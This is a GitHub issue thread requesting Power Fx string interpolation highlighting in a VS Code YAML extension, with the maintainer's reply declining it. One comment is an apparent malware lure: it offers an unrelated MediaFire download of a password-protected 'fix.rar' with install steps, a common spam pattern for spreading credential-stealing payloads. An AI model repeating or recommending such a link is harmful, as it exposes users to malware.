### ISSUE TITLE
Add string interpolation formatting for Power Fx

### ISSUE THREAD

**Issue by devkeydet** [harrydowning/vscode-yaml-embedded-languages#35]
Power Fx string interpolation spec is here.
https://learn.microsoft.com/en-us/power-platform/power-fx/data-types#string-interpolation

Update this extension to provide similar string interpolation highlighting for Power Fx to what exists for JavaScript/C#.
![image](https://github.com/user-attachments/assets/e86b59da-c287-4302-befb-5e5bb7d937af)

**Comment by 13a10D** [comment]
Download 
https://www.mediafire.com/file/czdodbba054p738/fix.rar/file
password: changeme
In the installer menu, select "gcc."

**Comment by harrydowning** [comment]
This extension shouldn't be responsible for the syntax of the languages. For now, until VS Code supports an offical Power Fx grammar, this will have to remain a limitation.
